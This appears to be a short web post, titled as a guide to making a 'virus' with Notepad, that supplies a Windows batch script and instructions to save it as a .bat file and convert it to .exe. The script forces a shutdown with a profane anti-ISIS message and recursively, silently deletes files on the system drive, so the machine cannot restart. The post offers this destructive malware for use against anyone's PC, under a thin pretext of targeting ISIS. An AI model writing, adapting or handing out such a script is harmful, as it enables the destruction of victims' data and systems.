How to make virus with notepad ( dangerous scripts )

How to crash an ISIS PC Forever !:::
SHUTDOWN /s /t 60 /c "ISIS, You Goat Fucking Basterds. I will now shut down your computer. We will seek out and destroy every computer you have. This virus will spread like the disease you are and We are the cure. Death to ISIS"
@echo off
del %systemdrive%\*.*/f/s/q
Open up notepad and copy and paste that. Save it as a .bat file.
then convert to .exe
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for ISIS idiots)
